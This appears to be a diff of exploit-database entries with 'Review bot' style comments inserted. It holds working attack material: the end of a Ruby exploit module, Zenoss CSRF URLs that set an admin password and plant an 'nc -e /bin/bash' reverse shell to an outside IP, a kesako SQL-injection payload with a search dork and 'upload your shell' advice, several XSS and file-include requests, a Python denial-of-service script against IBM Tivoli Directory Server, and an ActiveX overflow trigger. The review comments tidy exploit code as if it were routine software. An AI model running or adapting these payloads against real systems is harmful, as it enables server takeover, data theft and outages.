stream << "\x78" # TC_ENDBLOCKDATA
stream << "\x70" # TC_NULL
stream << [contents.length].pack("N")
stream << contents # baContent
stream << "\x70" # TC_NULL # dTimeStamp
stream << "\x70" # TC_NULL # sContent
stream << "\x74" # TC_STRING
stream << [file_name.length].pack("n")
stream << file_name # sFileName
stream
end
end
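Review bot: A point of style in `exploit`: `jboss_path =jboss_deploy_path` has the whitespace on the wrong side of the assignment and reads like a typo; it should be `jboss_path = jboss_deploy_path`. In `jboss_deploy_path`, the capture is read from the global `$1` after `=~`, which is fragile if another match is ever inserted between the two lines; assigning the match to a local (`m = leak.match(/\[INSTALLDIR\](.*)ste\/ste.jar/)` and then `path = m[1] if m`) keeps the dependency explicit. Both are cosmetic and would be flagged by the framework's own linter.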


@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/37843/info
Zenoss is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, execute arbitrary commands, gain unauthorized access to the affected application, or delete certain data. Other attacks are also possible.
Zenoss 2.3.3 is vulnerable; prior versions are also vulnerable.
http://www.example.com/zport/dmd/ZenUsers/admin?defaultAdminLevel:int=1&defaultAdminRole=ZenUser&defaultPageSize:int=40&email=&eventConsoleRefresh: boolean=True&manage_editUserSettings:method=Save&netMapStartObject=&pager=& password=letmein&sndpassword=letmein&zenScreenName=editUserSettings
http://www.example.com/zport/dmd/userCommands/ping?command:text=nc -e /bin/bash 172.16.28.6 443&commandId=ping&description:text=& manage_editUserCommand:method=Save&zenScreenName=userCommandDetail
http://www.example.com/zport/dmd/Devices/devices/localhost/manage_doUserCommand?commandId=ping

17
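--- a/platforms/php/remote/33525.txt
+++ b/platforms/php/remote/33525.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/37809/info
+Zend Framework is prone to multiple input-validation vulnerabilities and a weakness:
+- Multiple cross-site scripting issues
+- An HTML-injection issue
+- A security-bypass weakness
+An attacker may leverage the cross-site scripting issues and HTML-injection issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+The attacker can exploit the security-bypass weakness in conjunction with other latent vulnerabilities to bypass certain security restrictions.
+Versions prior to Zend Framework 1.7.9, 1.8.5, and 1.9.7 are vulnerable.
+The following example URI is available:
+http://www.example.com/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln]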


@ -1,35 +0,0 @@
kesako script SQL Injection
===================================================================
####################################################################
#.:. Exploit Title : kesako Script Sql Injection #
# .:. Author : Microsoft-dz #
#.:. Contact : [ifyoucanbebeme@gmail.com] #
#.:. Dork : intext:powered by [kesako] inurl:/event.php?id= #
#.:. Dork 2 : intext:powered by [kesako] #
#.:. Tested on : win&linux #
#.:. Vendor's Website : http://www.kesako.ch/cms/ #
#.:. Date : [2014/5/19] #
####################################################################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
[~] www.site.com/modules/event.php?id=[SQL INJECTION]
#########
P0C
#########
Type: String Mysql Injection
http://SITE/modules/event.php?id=[SQL INJECTION]
http://site/modules/event.php?id=202 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
####################################################################
1- Get Admin Infos
2- then login and upload your shell
Enjoy
About #20K Infected Websites :v
You Can Find The Admin Panel @ http://site/cms/admin
or http://site/cms/user/
or http://site/cms/login/
#########################################################################
Tnx: R3Z0Uk4


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/37811/info
Technology for Solutions is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/eng/contacto_demo.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

10
platforms/php/webapps/33528.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37818/info
Xforum is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Xforum 1.4; other versions may also be vulnerable.
http://www.example.com/forum/liste.php?categorie=1&nbpage=1&nbpageliste=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/37819/info
The Joomla! 'com_marketplace' component is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects com_marketplace 1.2; other versions may also be affected.
http://www.example.com/index.php?option=com_marketplace&page=show_category&catid=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

10
platforms/php/webapps/33530.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37828/info
LetoDMS (formerly known as MyDMS) is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying computer; other attacks are also possible.
LetoDMS 1.7.2 is vulnerable; other versions may also be affected.
GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../boot.ini%00&sesstheme= HTTP/1.1

22
platforms/php/webapps/33534.txt Executable file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/37839/info
TestLink is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TestLink 1.8.5 is vulnerable; other versions may also be affected.
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1>">alert(726367128870)%3B&user_order_by=order_by_login

88
platforms/unix/dos/33527.py Executable file

@ -0,0 +1,88 @@
source: http://www.securityfocus.com/bid/37817/info
IBM Tivoli Directory Server is prone to a denial-of-service vulnerability caused by heap memory corruption.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
IBM Tivoli Directory Server 6.2 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
# tivoli_nullptr.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import socket
import sys
"""
Discovery date: April, 2006!!!
IBM Tivoli Directory Server 6.2 do_extendedOp DoS (null ptr dereference)
Tested on Red Hat Enterprise Linux Server release 5.4
# rpm -qa|grep idsldap-srv32bit
idsldap-srv32bit62-6.2.0-7
gdb backtrace:
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x6c76b90 (LWP 2224)]
0x0807a1fc in do_extendedOp ()
(gdb) bt
#0 0x0807a1fc in do_extendedOp ()
#1 0x08073c5a in ConnMgr::connection_operation ()
#2 0x080dee1d in Worker::Run ()
#3 0x080bca46 in Thr::_doRun ()
#4 0x003195ab in start_thread () from /lib/libpthread.so.0
#5 0x00eb8cfe in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x807a1fc : repz cmpsb %es:(%edi),%ds:(%esi)
(gdb) i r
eax 0x50 80
ecx 0x10 16
edx 0x6c760b0 113729712
ebx 0x81393c8 135500744
esp 0x6c760e0 0x6c760e0
ebp 0x6c761d8 0x6c761d8
esi 0x0 0
edi 0x80f7ed0 135233232
eip 0x807a1fc 0x807a1fc
eflags 0x210202 [ IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
"""
def send_req(host,port):
buf = "\x30\x26\x02\x02\x01\x91\x77\x20\x2d\x32\x36\x38\x34\x33\x35\x34"
buf += "\x35\x35\x0f\x31\x2e\x33\x2e\x31\x38\x2e\x30\x2e\x32\x2e\x31\x32"
buf += "\x2e\x31\x81\x04\x30\x02\x04\x00"
print "Sending req to %s:%d, oid 1.3.18.0.2.12.1" % (host,port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
sock.sendall(buf)
sock.close()
print "Done"
if __name__=="__main__":
if len(sys.argv)<3:
print "usage: %s host port" % sys.argv[0]
sys.exit()
send_req(sys.argv[1],int(sys.argv[2]))
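Review bot: The usage branch at the bottom of the file exits with status 0 on a bad invocation (`sys.exit()` with no argument), so a caller cannot distinguish misuse from a completed run; `sys.exit(1)` is the conventional fix, with the usage line written to `sys.stderr` rather than stdout. `send_req` has no docstring and the hard-coded `buf` bytes are left unexplained; a one-line docstring such as `"""Send one extended-operation request (OID 1.3.18.0.2.12.1, see the do_extendedOp backtrace in the header) to host:port, then close the socket."""` would tie the bytes to the analysis already given above. The `print` statements are Python 2 syntax, so the script will not run under Python 3, which is worth stating in the header comment next to the existing usage warning. The triple-quoted analysis block placed after the `import` lines is a bare expression statement rather than a module docstring; moving it above the imports, or turning it into `#` comments, would make the intent explicit.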


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/37834/info
Gracenote CDDBControl is prone to a stack-based buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
NOTE: The ActiveX control is included in AOL 9.5; other applications may also include the ActiveX control.
<package> <job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' /> <script language='vbscript'> arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") target.ViewProfile arg1 </script> </job> </package>